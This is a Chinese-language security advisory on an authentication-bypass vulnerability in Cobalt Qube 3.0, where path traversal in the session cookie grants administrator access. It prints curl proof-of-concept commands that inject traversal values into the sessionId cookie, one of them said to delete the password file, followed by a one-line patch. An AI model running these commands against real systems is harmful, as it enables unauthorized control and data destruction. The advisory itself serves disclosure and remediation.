Cobalt Qube验证可绕过漏洞发布时间:2002-07-27 更新时间:2002-07-27 严重程度:高 威胁程度:控制应用程序系统 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5297 受影响系统 Cobalt Qube 3.0详细描述 Cobalt Qube存在漏洞允许攻击者绕过验证机制和获得管理员权限。 问题存在于Cobalt Qube应用程序使用了不强壮的验证机制,Cobalt Qube的验证机制对用户提供的客户端COOKIE验证不正确,因为攻击者可以引用本地系统中包含会话KEY的文件,并提交请求,可使无需要验证访问管理员接口。 测试代码 $curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php 以上会删除密码文件。 $curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php $ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php 会获得管理信息。 解决方案 编辑下面的文件; /usr/sausalito/ui/libPhp/ServerScriptHelper.php line 64更改为: $sessionId = ereg_replace("\.\.","",$sessionId); 相关信息 pokley <saleh@scan-associates.net>: 参考:http://online.securityfocus.com/archive/1/284102 相关主页:http://www.cobalt.com/products/qube/ |
